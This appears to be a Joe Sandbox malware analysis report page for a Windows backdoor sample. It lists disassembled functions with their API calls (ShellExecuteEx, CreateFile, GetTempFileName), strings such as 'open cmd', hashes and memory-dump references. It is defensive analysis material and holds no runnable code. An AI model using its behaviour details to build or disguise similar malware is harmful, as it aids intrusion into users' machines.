Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
API String ID: 1941528284-535101974
Opcode ID: 2bbae9972c0614687d46280820d7d109de85215e056eb0cc334133bd45af8cb0
Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
Opcode Fuzzy Hash: 2bbae9972c0614687d46280820d7d109de85215e056eb0cc334133bd45af8cb0
Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033A2
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033CB
wsprintfW.USER32 ref: 004033DE

Strings

... %d%%, xrefs: 004033D8
Z8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$Z8@
API String ID: 551687249-843941321
Opcode ID: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
Opcode Fuzzy Hash: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406877 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
wsprintfW.USER32 ref: 004068C9
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD

Strings

%s%S.dll, xrefs: 004068C3
UXTHEME, xrefs: 00406880
\, xrefs: 0040689F

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406039 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406057
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406072

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040603E
nsa, xrefs: 00406046

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3083371207
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405E94: CharNextW.USER32(?,?,007A4750,?,00405F08,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405EA2
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A4B: CreateDirectoryW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405A8E

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 1892508949-3291747264
Opcode ID: 5737488d322210aef038a15db73d02009b1a21ccc104f7f50523705260184c44
Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
Opcode Fuzzy Hash: 5737488d322210aef038a15db73d02009b1a21ccc104f7f50523705260184c44
Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F12 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405B40: ShellExecuteExW.SHELL32(?), ref: 00405B4F

Part of subcall function 00406992: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 004069A3
Part of subcall function 00406992: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069C5

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6A
@, xrefs: 00401F8A

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 165873841-3426815298
Opcode ID: 6aacd96ff37752c2e584ea35064cf87376a7c920f6258fea4879495fca53abbe
Instruction ID: 50afd287f86dbb1b9840ce00b3b0add55affccdcf189c2d18f9fd219c9f0256a
Opcode Fuzzy Hash: 6aacd96ff37752c2e584ea35064cf87376a7c920f6258fea4879495fca53abbe
Instruction Fuzzy Hash: 15114971E042189ACB60EFB9DA49B8CB6F4AF04304F20447AE105F72C1EBBC8A459B18

Uniqueness

Uniqueness Score: -1.00%

Function 00406992 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 004069A3
WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 004069B8
GetExitCodeProcess.KERNELBASE(?,?), ref: 004069C5

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: 16e94b638c2cb02e7eef90cce34a41679e1e5b7c0e7ceec04fbe50ecc5462069
Instruction ID: 612ea2665b0c92228eee6969d5dafab2c0b27363579004502bf6782fab43ad3e
Opcode Fuzzy Hash: 16e94b638c2cb02e7eef90cce34a41679e1e5b7c0e7ceec04fbe50ecc5462069
Instruction Fuzzy Hash: 5AE0D872600108FBDB009B54ED05E9E7FAEEB44714F110033FA05B6190C7B69E22DBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 004068E7 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
GetProcAddress.KERNEL32(00000000,?), ref: 00406914

Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040600A Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FE5 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00405ACE
GetLastError.KERNEL32 ref: 00405ADC

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D

Uniqueness

Uniqueness Score: -1.00%

Function 0040608D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BF,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060A1

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
